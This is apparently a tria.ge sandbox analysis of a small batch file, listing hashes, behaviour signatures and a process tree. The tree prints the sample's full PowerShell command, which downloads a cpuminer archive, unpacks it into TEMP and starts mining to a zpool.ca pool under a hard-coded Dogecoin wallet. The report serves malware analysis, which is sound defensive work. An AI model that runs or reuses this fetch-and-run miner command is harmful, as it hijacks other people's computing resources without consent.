Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1798s -
max time network
1802s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
03/02/2024, 05:12
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-en
General
-
Target
73u3Ito.bat
-
Size
508B
-
MD5
d9af861fbfd5f212c2db65e7ed0cd376
-
SHA1
f9316adde0463e645cc0624f645faad3b972320a
-
SHA256
f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4
-
SHA512
92eb6c1e2a0e1cf196c97c9e9a9f3c53967f9ae58a2b675ce18e967b0e414e6b17ade6e914e96817df1878bbe11022b4737bae0d4078a257de9a132eb1a91536
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 4228 powershell.exe 4 4228 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4280 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4280 cpuminer-sse2.exe 4280 cpuminer-sse2.exe 4280 cpuminer-sse2.exe 4280 cpuminer-sse2.exe 4280 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4228 powershell.exe 4228 powershell.exe 4228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4228 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4488 wrote to memory of 4228 4488 cmd.exe 74 PID 4488 wrote to memory of 4228 4488 cmd.exe 74 PID 4228 wrote to memory of 3252 4228 powershell.exe 76 PID 4228 wrote to memory of 3252 4228 powershell.exe 76 PID 3252 wrote to memory of 4280 3252 cmd.exe 77 PID 3252 wrote to memory of 4280 3252 cmd.exe 77
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 23⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4280
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
1.2MB
MD5b465230cf79fcd815a31dad053d1dbe1
SHA1f1bf5606ba3d1bb49d9437b5ba489fd9e8614ace
SHA256cd616032256b5c1fdad92cf551a04c9f8fb9292262b19af72c1d8406b8baf865
SHA512b832fcdf586c0afad6f0fc7dd315ba3ae05d3e49ca730ddba0ac463620afd44215a3e2d3f906de41e4448dd91610b13633148048819156aa27a4ee3155d3e9bd
-
Filesize
1.1MB
MD5d6a2651ce86560ec77259efc3df246fa
SHA11e72d8e5049a66e1f257d00847fae193c2f8bb02
SHA2561703f2c16ca81fd8d53d899d0c191db61af986281cdaf3939e9aafcb2aa377a6
SHA512eece650394d481935c42793702efa7220ae51d92e50dde346b62026d1946418011f665dabe217b6e775b79d65b7580652299a816961a23880abff400ee14201b
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
2.1MB
MD535d4a2b508189bf6d5a295abdaf4f4d3
SHA14b5d11edbec4f6f8a6a24e8ff490030cc7cdb642
SHA256b711ee596f725d44e18faa98c84ca1a61b900b239f333fa20fb087b2e75df8c3
SHA5128a92e0e830809e6e932ce2a314cf6b23ee14265c1b902204e84909b87232232a7a1f4120c1396029abeeaed88300e790bf7e73036fbb0d87d1a69e4fd4798087
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
4.2MB
MD5aff0055164dab7d37064632c3c6cc649
SHA19bb5c7ddb0e101684cff40a63e0416a2b3565200
SHA25693fa7b9b3862b92612530e3dddf0d898ccc9cb4881852653f14f739dcef7fec1
SHA512e5c6b9d751da5e1e72935be4feaac2efa45d79f3f5379768d1d9d541b8cbd297a2c2458dcf0a8123ea90b9c6e18c3dbbf64766bc4da8d1e09f952cdbab141ec5
-
Filesize
17.2MB
MD50e7357885c0f4de23e48a0dca68888ed
SHA1d150cec03b6fa237821d7a89ea8234a99539d306
SHA2563354dbdc185029afd2cf3e4731e86aa6ed3e0a8f504615433b8a575186a9b054
SHA51223a3f9fc5f5945cc28375b38468dbc9b587aa76c4a315cc63285b4b5da1e53ac9603280b9d879345cbcea69b0338f2c66669f69c4773e9385c03de8a1aeaad9f